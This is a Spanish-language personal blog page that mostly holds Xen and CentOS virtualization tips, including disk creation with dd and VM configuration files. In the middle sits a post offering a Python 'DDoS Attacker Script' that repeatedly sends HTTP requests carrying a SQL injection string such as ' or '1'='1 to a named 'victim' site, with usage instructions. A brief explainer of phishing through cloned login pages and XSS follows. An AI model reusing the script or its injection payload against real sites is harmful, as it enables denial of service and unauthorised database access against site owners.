Temas Referente a Linux
Antes de mostar cualquier cosa quiero dejar en claro que todo lo que leerán de aquí en adelante es sólo con fines educativos, si tu eres un hacker malo que le encanta hacer cosas feas a los sitios con este tipo de fallas tan estúpidas comunes, este documento no es para ti, asi que vete maldito delincuente hacker inescrupuloso.
Habien dicho todo esto, llego el momento de la acción. Wanna rock?
Este es el segundo post del día relacionado con Xen ya que he estado jugando con Xen, hace tiempo que no probaba cosas. Este post se trata de un tip para poder mgirar cualquier servidor hacia Xen, no importa si está virtualizado con VMWare, si es una máquina fisica, Xen, etc etc, es una forma bastante sencilla que no tiene ninguna ciencia.
La teoría
Copiar todos los archivos (por red) de una máquina a otra manteniendo los permisos e integridad de cada fichero.
La práctica
Lo haremos en 4 sencillos pasos y haciendo uso de la herramienta rsync
Luego de intentar varias maneras de instalar CentOS sobre Xen y luego de varios intentos fallidos, puedo resumir todo en 5 sensillos pasos para no morir en el intento.
Descargar las siguientes imágenes (checkear si existen más nuevas):
* https://mirror.centos.org/centos/5.3/os/i386/images/xen/vmlinuz
* https://mirror.centos.org/centos/5.3/os/i386/images/xen/initrd.img
Por ejemplo, dejemoslo en /tmp/
wget https://mirror.centos.org/centos/5.3/os/i386/images/xen/vmlinuz -O /tmp/
wget https://mirror.centos.org/centos/5.3/os/i386/images/xen/initrd.img -O /tmp/
El fichero de configuración de la máquina debe ser algo como: (//modificar según requerimientos//)
kernel=’/tmp/vmlinuz’
ramdisk=’/tmp/initrd.img’
extra=’text’
maxmem=’3072′
memory=’2048′
vcpus=2disk=[
‘file:/vm/cpanel/root.img,hda,w’,
‘file:/vm/cpanel/home.img,hdb,w’,
‘file:/vm/cpanel/tmp_swap.img,hdc,w’,
]name=’cpanel’
vif=[ ‘ip=200.55.200.126,mac=00:1B:CC:C3:B3:33,bridge=xenbr1’ ]on_poweroff = ‘destroy’
on_reboot = ‘restart’
on_crash = ‘restart’
root será nuestra partición que montaremos en /
en home vamos a montar nuestro /home y
tmp_swap la usaremos para montar /tmp y la swap del sistema.
Creamos los discos:
dd if=/dev/zero of=root.img bs=1M count=10240 #10Gb
dd if=/dev/zero of=home.img bs=1M count=40960 #40Gb
dd if=/dev/zero of=tmp_swap.img bs=1M count=2048 #2Gb
Iniciamos la máquina virtual:
xm create -c configuration.cfg
Seguimos paso a paso la instalación y finalizamos.
Para bootear debemos hacer una modificacion en el fichero de configuración de la máquina, la dejamos así:
bootloader = ‘/usr/lib/xen-3.2-1/bin/pygrub’ #El path depende de la version
extra=’text’
maxmem=’3072′
memory=’2048′
vcpus=2disk=[
‘file:/vm/cpanel/root.img,hda,w’,
‘file:/vm/cpanel/home.img,hdb,w’,
‘file:/vm/cpanel/tmp_swap.img,hdc,w’,
]name=’cpanel’
vif=[ ‘ip=200.55.200.126,mac=00:1B:CC:C3:B3:33,bridge=xenbr1’ ]on_poweroff = ‘destroy’
on_reboot = ‘restart’
on_crash = ‘restart’
Luego iniciamos la maquina:
xm create configuration.cfg -c
“DDoS Attacker Script” es un pequeño script que he escrito en python que nos sirve para lograr con éxito un ataque de denegación de servicio en un sitio web. Este script lo diseñe especialmente para ataques de sql injection.
El funcionamiento es muy sencillo, se conecta y hace una petición de la URI especificada:
#!/usr/bin/python
import socket, sys, os
print "][ Attacking " + sys.argv[1] + " ... ]["
print "injecting " + sys.argv[2];
def attack():
#pid = os.fork()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 80))
print ">> GET /" + sys.argv[2] + " HTTP/1.1"
s.send("GET /" + sys.argv[2] + " HTTP/1.1\r\n")
s.send("Host: " + sys.argv[1] + "\r\n\r\n");
s.close()
for i in range(1, 10):
attack()
La línea número 6 está comentada, si prefieren la pueden descomentar para ver lo que sucede.
El uso del script es de la siguiente forma:
$ python DDoS.py www.pagina.com SQLi
En www.pagina.com obviamente pondremos nuestra víctima y en SQLi, la cadena que hará el milagro, por ejemplo “ver_productos.php?id=55′ or ‘1’=’1“
El phishing es una de las técnicas de robo de identidad e información más fácil de explotar, no porque el hacerlo sea sencillo, sino por las empresas y la gente que no se preocupa de proteger su información. Si bien esta técnica muchas veces requiere de ingenieria social (más aún cuando es un ataque dirigido), conocimientos basicos de programación y/o diseño o desarrollo web, es explotado muchas veces por personas no muy expertas y no necesariamente “hackers”.
El phishing se puede lograr de varias formas, entre las más conocidas están la duplicación de sitios web y mediante la vulnerabilidad XSS. Esta última facilita a la anterior.
Básicamente, ¿Qué es el phishing?
Definamos phishing como una tecnica de “pesca” para robar información privada/personal de personas y/o empresas.
¿Cómo se lleva acabo esta técnica?
Puede resultar tan sencillo como intentar engañar a un niño, pues hacemos creer a una persona algo que no lo es con la finalidad de que esta persona nos entregue datos confidenciales y/o privados, por ejemplo, mediante un formulario de login a un sistema (universidad, banco, etc) falsificado.
El otro día, jugando un rato con Xen me encontré con el problema de querer redimenzionar el tamaño de disco virtual de las máquinas virtuales y, cabezeandome un rato, lo logré.
En teoría, aumentar el tamaño de un disco es fácil, creamos un fichero del tamaño que queramos usando dd y luego concatenamos con el que ya tenemos, creamos el sistema de ficheros y listo. Pero el disminuirlo me pareció más complejo, pero no fue así.
© 2025 El rincón de Zerial
Tema por Anders Norén — Subir ↑
Comentarios recientes